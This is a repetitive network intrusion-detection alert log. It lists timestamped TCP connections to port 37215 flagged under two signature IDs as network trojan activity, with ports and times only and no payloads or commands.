            Timestamp:05/28/24-09:57:37.299991
            SID:2835222
            Source Port:54746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873159
            SID:2829579
            Source Port:41616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.673033
            SID:2829579
            Source Port:46844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336536
            SID:2829579
            Source Port:41042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723941
            SID:2829579
            Source Port:35638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767450
            SID:2829579
            Source Port:48890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910091
            SID:2829579
            Source Port:59236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555426
            SID:2835222
            Source Port:48340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843591
            SID:2829579
            Source Port:60720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956381
            SID:2829579
            Source Port:52316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.652075
            SID:2835222
            Source Port:37780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.947583
            SID:2829579
            Source Port:32800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834174
            SID:2829579
            Source Port:52304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862932
            SID:2829579
            Source Port:41610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344529
            SID:2835222
            Source Port:51532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.904801
            SID:2829579
            Source Port:54510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808434
            SID:2835222
            Source Port:50504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079274
            SID:2829579
            Source Port:36994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371287
            SID:2829579
            Source Port:49996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069607
            SID:2829579
            Source Port:57358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655829
            SID:2829579
            Source Port:33956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926411
            SID:2835222
            Source Port:56236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912191
            SID:2835222
            Source Port:42730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333097
            SID:2835222
            Source Port:42954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714518
            SID:2829579
            Source Port:40662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821656
            SID:2829579
            Source Port:49834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723611
            SID:2835222
            Source Port:47416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853644
            SID:2829579
            Source Port:39630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812202
            SID:2835222
            Source Port:58816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069036
            SID:2835222
            Source Port:57696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045130
            SID:2829579
            Source Port:45212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827406
            SID:2829579
            Source Port:56842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990032
            SID:2835222
            Source Port:52118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873344
            SID:2829579
            Source Port:48328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024660
            SID:2835222
            Source Port:48240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261051
            SID:2835222
            Source Port:44560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321281
            SID:2835222
            Source Port:40102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002236
            SID:2829579
            Source Port:37764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676520
            SID:2835222
            Source Port:55600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604470
            SID:2829579
            Source Port:53746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.908418
            SID:2829579
            Source Port:43918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469939
            SID:2829579
            Source Port:49156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470727
            SID:2835222
            Source Port:60832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972818
            SID:2835222
            Source Port:43502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869073
            SID:2829579
            Source Port:38110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499793
            SID:2829579
            Source Port:42146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052704
            SID:2835222
            Source Port:42262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.517767
            SID:2835222
            Source Port:39078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675843
            SID:2835222
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.333007
            SID:2835222
            Source Port:44560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052974
            SID:2829579
            Source Port:33502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821631
            SID:2829579
            Source Port:39320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.796039
            SID:2829579
            Source Port:56186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.914018
            SID:2835222
            Source Port:45486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547786
            SID:2835222
            Source Port:54746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899555
            SID:2835222
            Source Port:56586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639865
            SID:2835222
            Source Port:40928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.633358
            SID:2829579
            Source Port:47386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.307167
            SID:2829579
            Source Port:48938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654651
            SID:2835222
            Source Port:35906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952603
            SID:2835222
            Source Port:60080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038344
            SID:2835222
            Source Port:44498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841128
            SID:2835222
            Source Port:42450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866395
            SID:2835222
            Source Port:57634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952032
            SID:2829579
            Source Port:51450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865414
            SID:2835222
            Source Port:53954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040055
            SID:2835222
            Source Port:41664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868462
            SID:2829579
            Source Port:52198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759802
            SID:2835222
            Source Port:40182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834397
            SID:2835222
            Source Port:48496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.588027
            SID:2835222
            Source Port:49802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821512
            SID:2835222
            Source Port:46244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601790
            SID:2835222
            Source Port:53862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857514
            SID:2829579
            Source Port:47538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.660840
            SID:2829579
            Source Port:47888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507071
            SID:2835222
            Source Port:60070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321220
            SID:2829579
            Source Port:47370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260696
            SID:2829579
            Source Port:44070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899729
            SID:2829579
            Source Port:50732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482621
            SID:2835222
            Source Port:50756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313166
            SID:2829579
            Source Port:56556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961457
            SID:2835222
            Source Port:49508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887739
            SID:2835222
            Source Port:57766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562949
            SID:2835222
            Source Port:39420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.850986
            SID:2829579
            Source Port:54708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074248
            SID:2835222
            Source Port:57272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810311
            SID:2835222
            Source Port:49790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840205
            SID:2835222
            Source Port:39538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.685927
            SID:2829579
            Source Port:45366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562305
            SID:2835222
            Source Port:45540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756606
            SID:2835222
            Source Port:50548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.641604
            SID:2829579
            Source Port:42300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045151
            SID:2835222
            Source Port:42926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.747038
            SID:2829579
            Source Port:33224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.548218
            SID:2829579
            Source Port:52732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052215
            SID:2829579
            Source Port:45632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675888
            SID:2835222
            Source Port:40746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052833
            SID:2829579
            Source Port:49844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.376871
            SID:2835222
            Source Port:52414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070253
            SID:2835222
            Source Port:38344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734208
            SID:2829579
            Source Port:60128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909638
            SID:2829579
            Source Port:47448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506834
            SID:2835222
            Source Port:56058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923645
            SID:2829579
            Source Port:47720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916612
            SID:2835222
            Source Port:58706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704913
            SID:2835222
            Source Port:48916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046926
            SID:2835222
            Source Port:53744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932825
            SID:2835222
            Source Port:60334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508171
            SID:2829579
            Source Port:58354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961070
            SID:2829579
            Source Port:52486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996230
            SID:2835222
            Source Port:47276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760033
            SID:2835222
            Source Port:58266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012377
            SID:2829579
            Source Port:60022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900756
            SID:2829579
            Source Port:57226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321699
            SID:2835222
            Source Port:53672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953397
            SID:2835222
            Source Port:55088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714659
            SID:2835222
            Source Port:58668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939279
            SID:2835222
            Source Port:46832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.976884
            SID:2829579
            Source Port:37424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990497
            SID:2829579
            Source Port:59554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582621
            SID:2829579
            Source Port:56448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276269
            SID:2829579
            Source Port:36764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231129
            SID:2835222
            Source Port:56532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777751
            SID:2835222
            Source Port:58566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261400
            SID:2829579
            Source Port:55546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506231
            SID:2829579
            Source Port:39302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559348
            SID:2835222
            Source Port:47316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.544458
            SID:2835222
            Source Port:48560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541395
            SID:2829579
            Source Port:48748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815621
            SID:2835222
            Source Port:35570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773957
            SID:2829579
            Source Port:45670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778196
            SID:2835222
            Source Port:57074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816754
            SID:2835222
            Source Port:35600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848421
            SID:2835222
            Source Port:33570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858013
            SID:2835222
            Source Port:38810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868624
            SID:2829579
            Source Port:47578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506767
            SID:2835222
            Source Port:48904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.668122
            SID:2829579
            Source Port:35960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319186
            SID:2829579
            Source Port:47098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444149
            SID:2835222
            Source Port:48388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.872158
            SID:2829579
            Source Port:49632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443163
            SID:2835222
            Source Port:50672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857658
            SID:2829579
            Source Port:60956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563981
            SID:2835222
            Source Port:34808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762058
            SID:2835222
            Source Port:56908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857558
            SID:2835222
            Source Port:49084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433539
            SID:2835222
            Source Port:49182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899621
            SID:2835222
            Source Port:34864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952850
            SID:2835222
            Source Port:38940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.729523
            SID:2829579
            Source Port:50392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473971
            SID:2835222
            Source Port:47272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043184
            SID:2835222
            Source Port:55976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810931
            SID:2829579
            Source Port:38244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989986
            SID:2829579
            Source Port:53834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507629
            SID:2829579
            Source Port:40206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999438
            SID:2835222
            Source Port:40402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555092
            SID:2829579
            Source Port:35850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334965
            SID:2829579
            Source Port:51700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.016161
            SID:2835222
            Source Port:34456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020219
            SID:2835222
            Source Port:34266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004830
            SID:2835222
            Source Port:43602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.841196
            SID:2835222
            Source Port:36254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.033450
            SID:2835222
            Source Port:37890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053380
            SID:2835222
            Source Port:59558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879501
            SID:2835222
            Source Port:34466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084488
            SID:2835222
            Source Port:33054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185646
            SID:2829579
            Source Port:39296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842780
            SID:2835222
            Source Port:56386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863587
            SID:2835222
            Source Port:41462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870388
            SID:2829579
            Source Port:56354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743687
            SID:2829579
            Source Port:47296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027115
            SID:2829579
            Source Port:53516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783681
            SID:2829579
            Source Port:52344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741892
            SID:2835222
            Source Port:42026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855606
            SID:2835222
            Source Port:56968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077828
            SID:2829579
            Source Port:48720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222009
            SID:2829579
            Source Port:52620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929601
            SID:2829579
            Source Port:54764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.274931
            SID:2829579
            Source Port:34152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532882
            SID:2829579
            Source Port:59594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.930025
            SID:2835222
            Source Port:43420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425122
            SID:2835222
            Source Port:45882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935216
            SID:2829579
            Source Port:38658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282853
            SID:2829579
            Source Port:60100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.447031
            SID:2835222
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783732
            SID:2835222
            Source Port:59918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.966619
            SID:2829579
            Source Port:33370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.294961
            SID:2835222
            Source Port:48316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.414181
            SID:2829579
            Source Port:60230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048753
            SID:2835222
            Source Port:54584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.071675
            SID:2829579
            Source Port:37688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946337
            SID:2835222
            Source Port:51898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.942960
            SID:2829579
            Source Port:58358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.322495
            SID:2835222
            Source Port:36028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.820640
            SID:2829579
            Source Port:34662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927198
            SID:2829579
            Source Port:54396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676107
            SID:2835222
            Source Port:60082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903093
